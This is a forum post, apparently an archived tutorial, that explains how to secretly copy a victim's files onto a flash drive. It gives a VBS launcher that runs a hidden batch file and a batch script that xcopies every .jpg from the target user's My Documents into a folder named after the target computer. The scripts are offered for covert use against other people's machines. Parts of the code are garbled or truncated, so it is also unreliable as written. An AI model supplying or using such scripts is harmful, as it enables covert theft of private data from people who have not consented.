Support Forums

Full Version: Copy Files to Flashdisc Silently
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Tricks To Copy Data Flash Disk-Still In Silence
1. Open notepad, create a vbs file type or copy and paste the following script:
dim wshshell, dos
wscript.createobject set wshshell = ( "wscript.shell")
dos = wshshell.expandenvironmentstr ings ( "% coms ...
wshshell.run (dos & "/ c tarik.bat"), vbhide
2. Save as all files with start.vbs name
3. Open notepad again, make a bat file type or copy and paste the following script:
@ echo off
mkdir% computername%
xcopy "C: \ Documents and Settings \% username% \ My Documents \ *. jpg"% computername% / s / c / q / r
@ cls
@ exit
4. Save the file name tarik.bat save as type select all files.
Bat file name should be in accordance with the vbs script file line to four (tarik.bat)
Save the file in the flash disk, copy files to the target computer secretly run (2x click) file start.vbs.
Vbs file function (start.vbs) function to run a bat file (tarik.bat) secretly term or background process. While the bat file (tarik.bat) function to run the copy all files with a certain extensions in the target computer.
Example above is a copy of all the files jpg extension(image file) is in the My Documents folder on the target computer (see the third line script bat file) and saved into the flash disk into the appropriate folder with the name of the target computer. you can edit their own page on the second file format as needed files and folders on the target you will copy.